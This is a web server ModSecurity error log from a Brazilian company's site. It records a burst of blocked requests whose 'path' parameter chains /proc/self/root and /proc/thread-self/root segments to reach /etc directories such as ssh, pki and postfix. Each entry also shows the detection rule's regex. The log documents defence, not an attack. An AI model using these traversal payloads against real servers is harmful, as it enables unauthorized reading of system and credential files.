[Mon Mar 16 19:17:26.867838 2026] [:error] [pid 15568:tid 140411716749056] [client 74.7.241.46:59858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBdqQpVkWug9HeOt9X1gAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:32.524757 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.241.46:55992] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBfI6lpbStxTqkSkuM3AAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:34.499410 2026] [:error] [pid 14895:tid 140411716749056] [client 74.7.241.46:56004] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBfVajLEzk2WiQ-102UQAAAoM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:35.822415 2026] [:error] [pid 14895:tid 140411565680384] [client 74.7.241.46:56016] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBf1ajLEzk2WiQ-102UwAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:17:36.634756 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.243.203:43398] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBgEr9dMAiw-8KANNtcAAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:18:02.055121 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:60436] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBmrABkC4fWIHEf8EdXwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:18:05.215490 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:56026] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBnVajLEzk2WiQ-102cQAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:18:07.590101 2026] [:error] [pid 15568:tid 140411674785536] [client 74.7.243.203:54684] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBn6QpVkWug9HeOt9X3AAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:18:08.770199 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.241.46:41982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBoEr9dMAiw-8KANNtdwAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:18:12.214977 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:38362] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBpFajLEzk2WiQ-102dAAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:18:28.827579 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:38374] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBtEr9dMAiw-8KANNtjgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:18:32.203162 2026] [:error] [pid 29802:tid 140411565680384] [client 74.7.241.46:38810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiBuM_BxrYCr4hPDw8PlgAAAdU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:18:56.048056 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.241.46:38824] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiB0I6lpbStxTqkSkuM9wAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:18:57.385599 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.241.46:57476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiB0aQpVkWug9HeOt9X6AAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:19:00.860194 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.241.46:40918] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiB1KTCbgAP5jq5TehPVAAAAtQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:19:04.581766 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.241.46:40928] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiB2FajLEzk2WiQ-102fwAAApE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:19:40.394582 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:54694] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiB_LABkC4fWIHEf8EdxAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 19:19:41.813049 2026] [:error] [pid 29802:tid 140411666392832] [client 74.7.243.203:45658] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiB_c_BxrYCr4hPDw8P3gAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:19:45.069982 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:45674] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCAf9ocpUE4ed4uDwXwwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:19:57.306618 2026] [:error] [pid 15568:tid 140411666392832] [client 74.7.241.46:40944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCDKQpVkWug9HeOt9YHAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:20:08.096785 2026] [:error] [pid 14895:tid 140411616036608] [client 74.7.244.31:58760] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abiCGFajLEzk2WiQ-102mwAAAo8"]
[Mon Mar 16 19:20:30.999209 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:45676] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abiCLqTCbgAP5jq5TehPiAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
